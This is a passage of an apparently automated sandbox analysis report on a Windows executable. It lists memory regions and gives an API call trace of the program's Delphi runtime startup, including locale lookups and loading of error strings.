0x7fdd0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdd0000" filename = "" Region: id = 1148 start_va = 0x7f4c0000 end_va = 0x7f8effff entry_point = 0x0 region_type = private name = "private_0x000000007f4c0000" filename = "" Region: id = 1221 start_va = 0x7ef80000 end_va = 0x7f4bffff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 1226 start_va = 0x3750000 end_va = 0x382efff entry_point = 0x3750000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1282 start_va = 0x7f4c0000 end_va = 0x7f60ffff entry_point = 0x0 region_type = private name = "private_0x000000007f4c0000" filename = "" Region: id = 1446 start_va = 0x7f610000 end_va = 0x7f7bffff entry_point = 0x0 region_type = private name = "private_0x000000007f610000" filename = "" Region: id = 1449 start_va = 0x3830000 end_va = 0x396ffff entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 1450 start_va = 0x7fde0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fde0000" filename = "" Region: id = 1451 start_va = 0x7fd10000 end_va = 0x7fddffff entry_point = 0x0 region_type = private name = "private_0x000000007fd10000" filename = "" Region: id = 1452 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1453 start_va = 0x7fde0000 end_va = 0x7fe1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fde0000" filename = "" Region: id = 1454 start_va = 0x7fc30000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc30000" filename = "" Region: id = 1455 start_va = 0x7fb10000 end_va = 0x7fc2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb10000" filename = "" Region: id = 1456 start_va = 0x7fc30000 end_va = 0x7fc7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc30000" filename = "" Region: id = 1457 start_va = 0x7fc80000 end_va = 0x7fcdffff entry_point = 0x0 region_type = private name = "private_0x000000007fc80000" filename = "" Region: id = 1458 start_va = 0x7fce0000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fce0000" filename = "" Region: id = 1459 start_va = 0x7f890000 end_va = 0x7fb0ffff entry_point = 0x0 region_type = private name = "private_0x000000007f890000" filename = "" Region: id = 1480 start_va = 0x7fb10000 end_va = 0x7fbaffff entry_point = 0x0 region_type = private name = "private_0x000000007fb10000" filename = "" Region: id = 1481 start_va = 0x7fbb0000 end_va = 0x7fc7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fbb0000" filename = "" Region: id = 1482 start_va = 0x7fc80000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc80000" filename = "" Region: id = 1483 start_va = 0x7e9e0000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007e9e0000" filename = "" Region: id = 1484 start_va = 0x7e2d0000 end_va = 0x7e9dffff entry_point = 0x0 region_type = private name = "private_0x000000007e2d0000" filename = "" Region: id = 1485 start_va = 0x7fc30000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc30000" filename = "" Region: id = 1486 start_va = 0x7fb10000 end_va = 0x7fc2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb10000" filename = "" Region: id = 1487 start_va = 0x7e9e0000 end_va = 0x7ebaffff entry_point = 0x0 region_type = private name = "private_0x000000007e9e0000" filename = "" Region: id = 1821 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1822 start_va = 0x7fdc0000 end_va = 0x7fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 1823 start_va = 0x7fd30000 end_va = 0x7fdbffff entry_point = 0x0 region_type = private name = "private_0x000000007fd30000" filename = "" Region: id = 1824 start_va = 0x7fe30000 end_va = 0x7fe4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1825 start_va = 0x7fe50000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 1826 start_va = 0x7fc90000 end_va = 0x7fd2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc90000" filename = "" Region: id = 1827 start_va = 0x7fbc0000 end_va = 0x7fc8ffff entry_point = 0x0 region_type = private name = "private_0x000000007fbc0000" filename = "" Region: id = 1828 start_va = 0x7fc90000 end_va = 0x7fccffff entry_point = 0x0 region_type = private name = "private_0x000000007fc90000" filename = "" Region: id = 1829 start_va = 0x7fad0000 end_va = 0x7fbbffff entry_point = 0x0 region_type = private name = "private_0x000000007fad0000" filename = "" Region: id = 1830 start_va = 0x7f9a0000 end_va = 0x7facffff entry_point = 0x0 region_type = private name = "private_0x000000007f9a0000" filename = "" Region: id = 1831 start_va = 0x7faf0000 end_va = 0x7fbbffff entry_point = 0x0 region_type = private name = "private_0x000000007faf0000" filename = "" Region: id = 1832 start_va = 0x7f890000 end_va = 0x7f99ffff entry_point = 0x0 region_type = private name = "private_0x000000007f890000" filename = "" Region: id = 1833 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1834 start_va = 0x7fdc0000 end_va = 0x7fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 1835 start_va = 0x7fe30000 end_va = 0x7fe4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1836 start_va = 0x7fe50000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 1837 start_va = 0x7f7a0000 end_va = 0x7f88ffff entry_point = 0x0 region_type = private name = "private_0x000000007f7a0000" filename = "" Region: id = 1838 start_va = 0x7f670000 end_va = 0x7f79ffff entry_point = 0x0 region_type = private name = "private_0x000000007f670000" filename = "" Region: id = 1839 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1840 start_va = 0x7fdc0000 end_va = 0x7fdeffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 1841 start_va = 0x7fdf0000 end_va = 0x7fe1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 1842 start_va = 0x7fe20000 end_va = 0x7fe5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe20000" filename = "" Region: id = 1843 start_va = 0x7fce0000 end_va = 0x7fd2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fce0000" filename = "" Region: id = 1844 start_va = 0x7fc70000 end_va = 0x7fcdffff entry_point = 0x0 region_type = private name = "private_0x000000007fc70000" filename = "" Region: id = 1845 start_va = 0x7fce0000 end_va = 0x7fcfffff entry_point = 0x0 region_type = private name = "private_0x000000007fce0000" filename = "" Region: id = 1846 start_va = 0x7fd00000 end_va = 0x7fd2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd00000" filename = "" Region: id = 1847 start_va = 0x7f7a0000 end_va = 0x7f88ffff entry_point = 0x0 region_type = private name = "private_0x000000007f7a0000" filename = "" Region: id = 1868 start_va = 0x7fc00000 end_va = 0x7fd2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc00000" filename = "" Region: id = 1879 start_va = 0x7f840000 end_va = 0x7f88ffff entry_point = 0x0 region_type = private name = "private_0x000000007f840000" filename = "" Region: id = 1932 start_va = 0x7fe00000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe00000" filename = "" Region: id = 1933 start_va = 0x7fd60000 end_va = 0x7fdfffff entry_point = 0x0 region_type = private name = "private_0x000000007fd60000" filename = "" Region: id = 1935 start_va = 0x7fe00000 end_va = 0x7fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe00000" filename = "" Region: id = 1941 start_va = 0x7fe30000 end_va = 0x7fe6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1955 start_va = 0x7fc80000 end_va = 0x7fd5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc80000" filename = "" Region: id = 1956 start_va = 0x7fb60000 end_va = 0x7fc7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb60000" filename = "" Region: id = 2018 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 2048 start_va = 0x7fde0000 end_va = 0x7fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fde0000" filename = "" Region: id = 3025 start_va = 0x7fdd0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdd0000" filename = "" Region: id = 3159 start_va = 0x2490000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3160 start_va = 0x24d0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 3161 start_va = 0x7fcf0000 end_va = 0x7fdcffff entry_point = 0x0 region_type = private name = "private_0x000000007fcf0000" filename = "" Region: id = 3162 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 5198 start_va = 0x7fc10000 end_va = 0x7fceffff entry_point = 0x0 region_type = private name = "private_0x000000007fc10000" filename = "" Region: id = 5199 start_va = 0x7faf0000 end_va = 0x7fc0ffff entry_point = 0x0 region_type = private name = "private_0x000000007faf0000" filename = "" Region: id = 5768 start_va = 0x7fdd0000 end_va = 0x7fe0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdd0000" filename = "" Region: id = 5968 start_va = 0x7fe10000 end_va = 0x7fe5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe10000" filename = "" Region: id = 6093 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6125 start_va = 0x25d0000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 6126 start_va = 0x2610000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 6127 start_va = 0x7fca0000 end_va = 0x7fceffff entry_point = 0x0 region_type = private name = "private_0x000000007fca0000" filename = "" Region: id = 6128 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 6132 start_va = 0x7fe60000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Region: id = 6144 start_va = 0x7faf0000 end_va = 0x7fceffff entry_point = 0x0 region_type = private name = "private_0x000000007faf0000" filename = "" Region: id = 6256 start_va = 0x7fcf0000 end_va = 0x7fd6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fcf0000" filename = "" Region: id = 6257 start_va = 0x7fd70000 end_va = 0x7fe0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd70000" filename = "" Region: id = 6329 start_va = 0x7fe10000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe10000" filename = "" Region: id = 6330 start_va = 0x7f670000 end_va = 0x7faeffff entry_point = 0x0 region_type = private name = "private_0x000000007f670000" filename = "" Region: id = 6331 start_va = 0x7f5f0000 end_va = 0x7f66ffff entry_point = 0x0 region_type = private name = "private_0x000000007f5f0000" filename = "" Region: id = 6347 start_va = 0x7f4f0000 end_va = 0x7f5effff entry_point = 0x0 region_type = private name = "private_0x000000007f4f0000" filename = "" Region: id = 6348 start_va = 0x7f3b0000 end_va = 0x7f4effff entry_point = 0x0 region_type = private name = "private_0x000000007f3b0000" filename = "" Region: id = 6383 start_va = 0x7fde0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fde0000" filename = "" Region: id = 6384 start_va = 0x7fd10000 end_va = 0x7fddffff entry_point = 0x0 region_type = private name = "private_0x000000007fd10000" filename = "" Region: id = 6385 start_va = 0x7fde0000 end_va = 0x7fe1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fde0000" filename = "" Region: id = 6386 start_va = 0x7f4f0000 end_va = 0x7f53ffff entry_point = 0x0 region_type = private name = "private_0x000000007f4f0000" filename = "" Region: id = 6395 start_va = 0x7fc30000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc30000" filename = "" Region: id = 6396 start_va = 0x7fb10000 end_va = 0x7fc2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb10000" filename = "" Region: id = 6397 start_va = 0x7fc30000 end_va = 0x7fc7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc30000" filename = "" Region: id = 6398 start_va = 0x7fc80000 end_va = 0x7fcdffff entry_point = 0x0 region_type = private name = "private_0x000000007fc80000" filename = "" Region: id = 6411 start_va = 0x7fe20000 end_va = 0x7fe6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe20000" filename = "" Region: id = 6425 start_va = 0x7f540000 end_va = 0x7f5affff entry_point = 0x0 region_type = private name = "private_0x000000007f540000" filename = "" Region: id = 6426 start_va = 0x7fce0000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fce0000" filename = "" Region: id = 6427 start_va = 0x7f130000 end_va = 0x7f3affff entry_point = 0x0 region_type = private name = "private_0x000000007f130000" filename = "" Region: id = 6428 start_va = 0x7fe70000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 6429 start_va = 0x7ee10000 end_va = 0x7f12ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee10000" filename = "" Region: id = 6430 start_va = 0x7f130000 end_va = 0x7f1fffff entry_point = 0x0 region_type = private name = "private_0x000000007f130000" filename = "" Region: id = 6431 start_va = 0x7f200000 end_va = 0x7f2fffff entry_point = 0x0 region_type = private name = "private_0x000000007f200000" filename = "" Region: id = 6432 start_va = 0x7f5b0000 end_va = 0x7f62ffff entry_point = 0x0 region_type = private name = "private_0x000000007f5b0000" filename = "" Region: id = 6433 start_va = 0x7fb40000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb40000" filename = "" Region: id = 6589 start_va = 0x7f630000 end_va = 0x7f6cffff entry_point = 0x0 region_type = private name = "private_0x000000007f630000" filename = "" Region: id = 6764 start_va = 0x7fd10000 end_va = 0x7fd8ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd10000" filename = "" Region: id = 7009 start_va = 0x7fd90000 end_va = 0x7fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd90000" filename = "" Region: id = 7044 start_va = 0x7f6d0000 end_va = 0x7f79ffff entry_point = 0x0 region_type = private name = "private_0x000000007f6d0000" filename = "" Region: id = 7045 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 7046 start_va = 0x7efa0000 end_va = 0x7f3affff entry_point = 0x0 region_type = private name = "private_0x000000007efa0000" filename = "" Region: id = 7110 start_va = 0x7fd90000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd90000" filename = "" Region: id = 7111 start_va = 0x7fc60000 end_va = 0x7fd8ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc60000" filename = "" Region: id = 7112 start_va = 0x7fd90000 end_va = 0x7fddffff entry_point = 0x0 region_type = private name = "private_0x000000007fd90000" filename = "" Region: id = 7113 start_va = 0x7fde0000 end_va = 0x7fe3ffff entry_point = 0x0 region_type = private name = "private_0x000000007fde0000" filename = "" Region: id = 7114 start_va = 0x7fe40000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe40000" filename = "" Region: id = 7115 start_va = 0x7f9b0000 end_va = 0x7fc5ffff entry_point = 0x0 region_type = private name = "private_0x000000007f9b0000" filename = "" Region: id = 7116 start_va = 0x7fc60000 end_va = 0x7fd0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc60000" filename = "" Region: id = 7117 start_va = 0x7fd10000 end_va = 0x7fdeffff entry_point = 0x0 region_type = private name = "private_0x000000007fd10000" filename = "" Region: id = 7118 start_va = 0x7f7a0000 end_va = 0x7f89ffff entry_point = 0x0 region_type = private name = "private_0x000000007f7a0000" filename = "" Region: id = 7232 start_va = 0x7fd80000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd80000" filename = "" Region: id = 7250 start_va = 0x7fc40000 end_va = 0x7fd7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc40000" filename = "" Region: id = 7261 start_va = 0x7fd80000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd80000" filename = "" Region: id = 7262 start_va = 0x7fb00000 end_va = 0x7fc3ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb00000" filename = "" Region: id = 7408 start_va = 0x7f8a0000 end_va = 0x7f9dffff entry_point = 0x0 region_type = private name = "private_0x000000007f8a0000" filename = "" Region: id = 7736 start_va = 0x7f9e0000 end_va = 0x7fb6ffff entry_point = 0x0 region_type = private name = "private_0x000000007f9e0000" filename = "" Region: id = 7949 start_va = 0x7fb70000 end_va = 0x7fd5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb70000" filename = "" Region: id = 8210 start_va = 0x7fdc0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 8211 start_va = 0x7f2c0000 end_va = 0x7f3affff entry_point = 0x0 region_type = private name = "private_0x000000007f2c0000" filename = "" Region: id = 8212 start_va = 0x7f190000 end_va = 0x7f2bffff entry_point = 0x0 region_type = private name = "private_0x000000007f190000" filename = "" Region: id = 8213 start_va = 0x7f2c0000 end_va = 0x7f30ffff entry_point = 0x0 region_type = private name = "private_0x000000007f2c0000" filename = "" Region: id = 8214 start_va = 0x7f310000 end_va = 0x7f36ffff entry_point = 0x0 region_type = private name = "private_0x000000007f310000" filename = "" Region: id = 8215 start_va = 0x7f370000 end_va = 0x7f3affff entry_point = 0x0 region_type = private name = "private_0x000000007f370000" filename = "" Region: id = 8216 start_va = 0x7eee0000 end_va = 0x7f18ffff entry_point = 0x0 region_type = private name = "private_0x000000007eee0000" filename = "" Region: id = 8217 start_va = 0x7f190000 end_va = 0x7f23ffff entry_point = 0x0 region_type = private name = "private_0x000000007f190000" filename = "" Region: id = 8218 start_va = 0x7f240000 end_va = 0x7f31ffff entry_point = 0x0 region_type = private name = "private_0x000000007f240000" filename = "" Region: id = 8219 start_va = 0x7f320000 end_va = 0x7f3affff entry_point = 0x0 region_type = private name = "private_0x000000007f320000" filename = "" Region: id = 8220 start_va = 0x7e8d0000 end_va = 0x7eedffff entry_point = 0x0 region_type = private name = "private_0x000000007e8d0000" filename = "" Region: id = 8221 start_va = 0x7eee0000 end_va = 0x7f06ffff entry_point = 0x0 region_type = private name = "private_0x000000007eee0000" filename = "" Region: id = 8222 start_va = 0x7f070000 end_va = 0x7f25ffff entry_point = 0x0 region_type = private name = "private_0x000000007f070000" filename = "" Region: id = 9583 start_va = 0x7fdf0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 9584 start_va = 0x7fd30000 end_va = 0x7fdeffff entry_point = 0x0 region_type = private name = "private_0x000000007fd30000" filename = "" Region: id = 9585 start_va = 0x7fdf0000 end_va = 0x7fe1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 9586 start_va = 0x7fe20000 end_va = 0x7fe5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe20000" filename = "" Region: id = 9587 start_va = 0x7fce0000 end_va = 0x7fd2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fce0000" filename = "" Region: id = 9588 start_va = 0x7fc70000 end_va = 0x7fcdffff entry_point = 0x0 region_type = private name = "private_0x000000007fc70000" filename = "" Region: id = 9589 start_va = 0x7fce0000 end_va = 0x7fcfffff entry_point = 0x0 region_type = private name = "private_0x000000007fce0000" filename = "" Region: id = 9590 start_va = 0x7fd00000 end_va = 0x7fd2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd00000" filename = "" Region: id = 9591 start_va = 0x7fb80000 end_va = 0x7fc6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb80000" filename = "" Region: id = 9592 start_va = 0x7fc70000 end_va = 0x7fcaffff entry_point = 0x0 region_type = private name = "private_0x000000007fc70000" filename = "" Region: id = 9677 start_va = 0x7fdc0000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 9678 start_va = 0x7fcd0000 end_va = 0x7fdbffff entry_point = 0x0 region_type = private name = "private_0x000000007fcd0000" filename = "" Region: id = 9679 start_va = 0x7fdc0000 end_va = 0x7fdfffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 9680 start_va = 0x7faa0000 end_va = 0x7fb7ffff entry_point = 0x0 region_type = private name = "private_0x000000007faa0000" filename = "" Region: id = 9681 start_va = 0x7f980000 end_va = 0x7fa9ffff entry_point = 0x0 region_type = private name = "private_0x000000007f980000" filename = "" Thread: id = 1 os_tid = 0x360 [0073.735] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0073.736] SetThreadLocale (Locale=0x400) returned 1 [0073.739] GetVersion () returned 0x23f00206 [0073.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0073.739] GetProcAddress (hModule=0x75130000, lpProcName="GetThreadPreferredUILanguages") returned 0x751495e0 [0073.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0073.740] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadPreferredUILanguages") returned 0x75149a20 [0073.740] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0073.740] GetProcAddress (hModule=0x75130000, lpProcName="GetThreadUILanguage") returned 0x7514d980 [0073.740] GetSystemInfo (in: lpSystemInfo=0x19fbe4 | out: lpSystemInfo=0x19fbe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0073.740] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0073.740] GetStartupInfoW (in: lpStartupInfo=0x19fbc0 | out: lpStartupInfo=0x19fbc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0073.740] GetACP () returned 0x4e4 [0073.740] GetCurrentThreadId () returned 0x360 [0073.740] GetVersion () returned 0x23f00206 [0073.741] GetVersionExW (in: lpVersionInformation=0x19faf4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x779d37dd, dwMinorVersion=0x0, dwBuildNumber=0x19fbe0, dwPlatformId=0x0, szCSDVersion="\x09") | out: lpVersionInformation=0x19faf4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0073.741] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19d9b0, nSize=0x20a | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0073.741] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19d79a, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0073.741] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1ed0000 [0073.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0073.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0073.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0073.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0073.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0073.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d714 | out: phkResult=0x19d714*=0x0) returned 0x2 [0073.742] GetUserDefaultUILanguage () returned 0x409 [0073.742] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0073.743] GetThreadUILanguage () returned 0x190409 [0073.743] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19d718 | out: pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19d718) returned 1 [0073.743] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x1ffa680, pcchLanguagesBuffer=0x19d718 | out: pulNumLanguages=0x19d6f0, pwszLanguagesBuffer=0x1ffa680, pcchLanguagesBuffer=0x19d718) returned 1 [0073.743] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.en-US", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0073.743] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.en", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0073.744] GetUserDefaultUILanguage () returned 0x409 [0073.744] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x19d734, cchData=4 | out: lpLCData="ENU") returned 4 [0073.789] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.ENU", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0073.790] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.EN", lpFindFileData=0x19d4c0 | out: lpFindFileData=0x19d4c0) returned 0xffffffff [0073.790] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0073.791] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0073.791] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0073.791] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0073.791] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0073.792] LoadStringW (in: hInstance=0x400000, 